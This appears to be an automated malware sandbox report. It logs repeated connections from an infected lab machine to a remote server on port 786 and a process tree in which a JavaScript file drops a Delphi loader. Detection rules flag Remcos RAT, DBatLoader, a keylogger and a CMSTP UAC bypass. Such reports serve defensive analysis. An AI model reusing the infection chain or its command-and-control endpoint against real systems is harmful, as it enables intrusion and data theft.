                              Mar 15, 2025 09:32:30.123222113 CET | 49724 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:30.127931118 CET | 786 | 49724 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:31.138993979 CET | 49725 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:31.143824100 CET | 786 | 49725 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:31.143944979 CET | 49725 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:31.144340038 CET | 49725 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:31.149020910 CET | 786 | 49725 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:32.762708902 CET | 786 | 49725 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:32.762792110 CET | 49725 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:32.762909889 CET | 49725 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:32.767535925 CET | 786 | 49725 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:33.763966084 CET | 49726 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:33.768717051 CET | 786 | 49726 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:33.772301912 CET | 49726 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:33.772651911 CET | 49726 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:33.777343035 CET | 786 | 49726 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:35.392576933 CET | 786 | 49726 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:35.392648935 CET | 49726 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:35.392700911 CET | 49726 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:35.398255110 CET | 786 | 49726 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:36.404561996 CET | 49728 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:36.409379959 CET | 786 | 49728 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:36.409492970 CET | 49728 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:36.409859896 CET | 49728 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:36.415194988 CET | 786 | 49728 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:38.027512074 CET | 786 | 49728 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:38.027638912 CET | 49728 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:38.027738094 CET | 49728 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:38.032430887 CET | 786 | 49728 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:39.030411959 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:39.035339117 CET | 786 | 49729 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:39.035950899 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:39.035950899 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:39.040647984 CET | 786 | 49729 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:40.891376972 CET | 786 | 49729 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:40.891446114 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:40.891493082 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:40.891587019 CET | 786 | 49729 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:40.891637087 CET | 49729 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:40.897115946 CET | 786 | 49729 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:41.904700994 CET | 49730 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:41.909615993 CET | 786 | 49730 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:41.910490990 CET | 49730 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:41.910892963 CET | 49730 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:41.915572882 CET | 786 | 49730 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:43.526068926 CET | 786 | 49730 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:43.526139021 CET | 49730 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:43.526232958 CET | 49730 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:43.531039000 CET | 786 | 49730 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:44.529705048 CET | 49731 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:44.570375919 CET | 786 | 49731 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:44.570734024 CET | 49731 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:44.571145058 CET | 49731 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:44.575743914 CET | 786 | 49731 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:46.201579094 CET | 786 | 49731 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:46.201649904 CET | 49731 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:46.203609943 CET | 49731 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:46.208298922 CET | 786 | 49731 | 196.251.83.79 | 192.168.2.6
                              Mar 15, 2025 09:32:47.217741966 CET | 49732 | 786 | 192.168.2.6 | 196.251.83.79
                              Mar 15, 2025 09:32:47.222405910 CET78649732196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:47.223263025 CET49732786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:47.223568916 CET49732786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:47.228230000 CET78649732196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:48.839046001 CET78649732196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:48.842432022 CET49732786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:48.843586922 CET49732786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:48.848347902 CET78649732196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:49.810970068 CET49733786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:49.815979004 CET78649733196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:49.816107035 CET49733786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:49.816416979 CET49733786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:49.821088076 CET78649733196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:51.432878017 CET78649733196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:51.434359074 CET49733786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:51.434392929 CET49733786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:51.439115047 CET78649733196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:52.374006987 CET49734786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:52.379565001 CET78649734196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:52.382399082 CET49734786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:52.384068966 CET49734786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:52.389657974 CET78649734196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:54.019368887 CET78649734196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:54.019428015 CET49734786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:54.019473076 CET49734786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:54.024177074 CET78649734196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:54.936635017 CET49735786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:54.941867113 CET78649735196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:54.942678928 CET49735786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:54.943020105 CET49735786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:54.947750092 CET78649735196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:56.577567101 CET78649735196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:56.577634096 CET49735786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:56.577693939 CET49735786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:56.582397938 CET78649735196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:57.451683044 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:57.457874060 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:57.457995892 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:57.458364010 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:57.463018894 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.082218885 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.082307100 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.082339048 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.088320971 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.936065912 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.940969944 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.941118956 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.941581011 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.946310043 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:01.566036940 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:01.566353083 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:01.571844101 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:01.576477051 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:02.388932943 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.393697023 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:02.393851042 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.394133091 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.398830891 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.035547972 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.035742998 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.035959005 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.040602922 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.842169046 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.846930981 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.847048044 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.847377062 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.852089882 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:06.493746996 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:06.494410992 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:06.494450092 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:06.499150991 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:07.264367104 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.269217968 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:07.269381046 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.274194956 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.278961897 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:08.907151937 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:08.908410072 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:08.912328005 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:08.917047024 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:09.654628992 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.659667015 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:09.662401915 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.662704945 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.667644024 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.279426098 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.279561043 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:11.279645920 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:11.285490036 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.998512030 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.003391981 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:12.006839037 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.007178068 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.011887074 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:13.641973019 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:13.642040014 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:13.642076015 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:13.646794081 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:14.342058897 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.346820116 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:14.346925974 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.347337008 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.352024078 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:15.968436003 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:15.972378016 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:15.972460985 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:15.977094889 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:16.639159918 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.643877983 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:16.643963099 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.644299984 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.649022102 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.262861967 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.266608000 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.266694069 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.271385908 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.920434952 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.925235033 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.925380945 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.925743103 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.930399895 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:20.546535015 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:20.550678015 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:20.550714016 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:20.555514097 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:21.185926914 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.190680027 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:21.190752983 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.191057920 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.195781946 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:22.817332029 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:22.818516970 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:22.818595886 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:22.823323965 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:23.435920000 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.440774918 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:23.440859079 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.441246986 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.445976973 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.067589998 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.067662954 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.067769051 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.073034048 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.654603958 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.660978079 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.661062956 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.661454916 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.666497946 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:27.276787043 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:27.276889086 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:29.592546940 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:29.597294092 CET78649748196.251.83.79192.168.2.6

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:1
                              Start time:04:31:17
                              Start date:15/03/2025
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js"
                              Imagebase:0x7ff64ffa0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:04:31:18
                              Start date:15/03/2025
                              Path:C:\Users\user\AppData\Local\Temp\x.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Yara matches:
                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 75%, ReversingLabs
                              • Detection: 40%, Virustotal
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:04:31:19
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:moderate
                              Has exited:false

                              Target ID:15
                              Start time:04:31:29
                              Start date:15/03/2025
                              Path:C:\Users\user\Links\Ekbmajrx.PIF
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Links\Ekbmajrx.PIF"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 75%, ReversingLabs
                              • Detection: 40%, Virustotal
                              Reputation:low
                              Has exited:true

                              Target ID:16
                              Start time:04:31:30
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:true

                              Target ID:18
                              Start time:04:31:37
                              Start date:15/03/2025
                              Path:C:\Users\user\Links\Ekbmajrx.PIF
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Links\Ekbmajrx.PIF"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:19
                              Start time:04:31:37
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
